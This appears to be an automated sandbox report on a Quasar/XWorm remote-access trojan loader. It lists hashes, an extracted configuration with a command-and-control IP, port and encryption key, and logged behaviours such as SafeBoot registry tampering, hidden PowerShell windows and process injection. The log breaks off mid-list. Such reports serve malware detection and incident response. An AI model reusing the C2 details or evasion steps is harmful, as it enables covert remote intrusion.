Analysis
-
max time kernel
570s -
max time network
575s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
04-12-2024 09:53
Behavioral task
behavioral1
Sample
Obekräftade 432398.zip
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
X-Worm-V5-main/XWorm V5.0/XWorm V5.0.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
X-Worm-V5-main/XWorm V5.0/XWormLoader.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
X-Worm-V5-main/XWorm V5.0/XWormLoader.exe
-
Size
8.6MB
-
MD5
2aff4d1edefd1017408f77bbf15ef6c2
-
SHA1
cfc1827c2e45802cbfe931ab66dea427c512a6ab
-
SHA256
7de8a4b7288fe71fdb8fa2eb453059937ce5ff998e117dc79c8d68de7e0f9315
-
SHA512
a456dba519592187461596f0ceb1e008e0a9a974a79698acda5bb1cfe000b99fd1bcafe140a022a40db6b447cb70e335dba137500a4f05e68299a3da758f9756
-
SSDEEP
196608:6HwveWmitDQXAWhg8tlFPreKofxWJHVP3u8CkXt0rQMJB4Eo:IkmitD85hgAtop81Hh0sUBk
Malware Config
Extracted
quasar
1.0.0.0
v3.0.0 | Slave
147.185.221.17:25792
92d55a7d-fa9d-4687-a639-1c17ad82e127
-
encryption_key
AAADD171AFB4583A86B8E61A97433E10C4015A71
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/720-72-0x0000014B7BC40000-0x0000014B7C43A000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XWormLoader.exe$sxr-mshta.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation XWormLoader.exe Key value queried \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 6 IoCs
Processes:
XWormLoader.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-cmd.exe$sxr-powershell.exepid Process 1148 XWormLoader.exe 1288 $sxr-mshta.exe 2392 $sxr-cmd.exe 720 $sxr-powershell.exe 220 $sxr-cmd.exe 348 $sxr-powershell.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 64 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\atapi powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LSI_SAS3i powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\percsas3i powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAcd powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbehci powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinNat powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\acpiex powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PNPMEM powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetTcpPortSharing powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PushToInstall\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasMan\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbprint\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbuhci powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpcMonSvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CredentialEnrollmentManagerUserSvc_27b8b powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\fhsvc\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\bindflt\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CDPSvc powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DPS\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\FileCrypt\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidi2c\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SamSs powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tunnel\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbccgp\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\volsnap powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinSock2 powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\.NETFramework\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppVClient powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MsLldp powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PcaSvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\VerifierExt powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WindowsTrustedRT powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserDataSvc_27b8b\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AarSvc_27b8b powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CscService powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\FontCache3.0.0.0 powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\megasas2i\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\msgpiowin32 powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetSetupSvc\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Sense\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\VirtualRender powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpdUpFltr powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WSearch powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaStorAV powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RemoteAccess powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\storahci\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\XboxNetApiSvc\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbehci\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BthA2dp powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CredentialEnrollmentManagerUserSvc_27b8b\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\diagsvc\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidinterrupt powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hvcrash powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MRxDAV powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TimeBrokerSvc powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wercplsupport powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\volsnap\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AJRouter powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\HdAudAddService\ = "Service" powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LanmanServer\ = "Service" powershell.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MozillaMaintenance powershell.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ndisuio\ = "Service" powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 3 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
$sxr-powershell.exe$sxr-cmd.exe$sxr-powershell.exepid Process 720 $sxr-powershell.exe 220 $sxr-cmd.exe 348 $sxr-powershell.exe -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\$sxr-mshta.exe powershell.exe File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 848 1148 WerFault.exe 80 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
XWormLoader.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWormLoader.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exemousocoreworker.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
mousocoreworker.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 56 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733306175" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:56:17 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8F4CBB41-74B8-4011-B44C-F76D702C5A96}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe -
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe$sxr-powershell.exe$sxr-powershell.exepid Process 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 348 $sxr-powershell.exe 348 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 348 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 348 $sxr-powershell.exe 348 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe 720 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe$sxr-powershell.exe$sxr-powershell.exeExplorer.EXEsvchost.exedescription pid Process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 720 $sxr-powershell.exe Token: SeDebugPrivilege 720 $sxr-powershell.exe Token: SeDebugPrivilege 720 $sxr-powershell.exe Token: SeDebugPrivilege 348 $sxr-powershell.exe Token: SeShutdownPrivilege 3548 Explorer.EXE Token: SeCreatePagefilePrivilege 3548 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2084 svchost.exe Token: SeIncreaseQuotaPrivilege 2084 svchost.exe Token: SeSecurityPrivilege 2084 svchost.exe Token: SeTakeOwnershipPrivilege 2084 svchost.exe Token: SeLoadDriverPrivilege 2084 svchost.exe Token: SeSystemtimePrivilege 2084 svchost.exe Token: SeBackupPrivilege 2084 svchost.exe Token: SeRestorePrivilege 2084 svchost.exe Token: SeShutdownPrivilege 2084 svchost.exe Token: SeSystemEnvironmentPrivilege 2084 svchost.exe Token: SeUndockPrivilege 2084 svchost.exe Token: SeManageVolumePrivilege 2084 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2084 svchost.exe Token: SeIncreaseQuotaPrivilege 2084 svchost.exe Token: SeSecurityPrivilege 2084 svchost.exe Token: SeTakeOwnershipPrivilege 2084 svchost.exe Token: SeLoadDriverPrivilege 2084 svchost.exe Token: SeSystemtimePrivilege 2084 svchost.exe Token: SeBackupPrivilege 2084 svchost.exe Token: SeRestorePrivilege 2084 svchost.exe Token: SeShutdownPrivilege 2084 svchost.exe Token: SeSystemEnvironmentPrivilege 2084 svchost.exe Token: SeUndockPrivilege 2084 svchost.exe Token: SeManageVolumePrivilege 2084 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2084 svchost.exe Token: SeIncreaseQuotaPrivilege 2084 svchost.exe Token: SeSecurityPrivilege 2084 svchost.exe Token: SeTakeOwnershipPrivilege 2084 svchost.exe Token: SeLoadDriverPrivilege 2084 svchost.exe Token: SeSystemtimePrivilege 2084 svchost.exe Token: SeBackupPrivilege 2084 svchost.exe Token: SeRestorePrivilege 2084 svchost.exe Token: SeShutdownPrivilege 2084 svchost.exe Token: SeSystemEnvironmentPrivilege 2084 svchost.exe Token: SeUndockPrivilege 2084 svchost.exe Token: SeManageVolumePrivilege 2084 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2084 svchost.exe Token: SeIncreaseQuotaPrivilege 2084 svchost.exe Token: SeSecurityPrivilege 2084 svchost.exe Token: SeTakeOwnershipPrivilege 2084 svchost.exe Token: SeLoadDriverPrivilege 2084 svchost.exe Token: SeSystemtimePrivilege 2084 svchost.exe Token: SeBackupPrivilege 2084 svchost.exe Token: SeRestorePrivilege 2084 svchost.exe Token: SeShutdownPrivilege 2084 svchost.exe Token: SeSystemEnvironmentPrivilege 2084 svchost.exe Token: SeUndockPrivilege 2084 svchost.exe Token: SeManageVolumePrivilege 2084 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2084 svchost.exe Token: SeIncreaseQuotaPrivilege 2084 svchost.exe Token: SeSecurityPrivilege 2084 svchost.exe Token: SeTakeOwnershipPrivilege 2084 svchost.exe Token: SeLoadDriverPrivilege 2084 svchost.exe Token: SeSystemtimePrivilege 2084 svchost.exe Token: SeBackupPrivilege 2084 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid Process 720 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XWormLoader.execmd.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedescription pid Process procid_target PID 4204 wrote to memory of 1148 4204 XWormLoader.exe 80 PID 4204 wrote to memory of 1148 4204 XWormLoader.exe 80 PID 4204 wrote to memory of 1148 4204 XWormLoader.exe 80 PID 4204 wrote to memory of 1124 4204 XWormLoader.exe 82 PID 4204 wrote to memory of 1124 4204 XWormLoader.exe 82 PID 1124 wrote to memory of 1604 1124 cmd.exe 87 PID 1124 wrote to memory of 1604 1124 cmd.exe 87 PID 1124 wrote to memory of 2164 1124 cmd.exe 88 PID 1124 wrote to memory of 2164 1124 cmd.exe 88 PID 1288 wrote to memory of 2392 1288 $sxr-mshta.exe 97 PID 1288 wrote to memory of 2392 1288 $sxr-mshta.exe 97 PID 2392 wrote to memory of 2896 2392 $sxr-cmd.exe 99 PID 2392 wrote to memory of 2896 2392 $sxr-cmd.exe 99 PID 2392 wrote to memory of 720 2392 $sxr-cmd.exe 100 PID 2392 wrote to memory of 720 2392 $sxr-cmd.exe 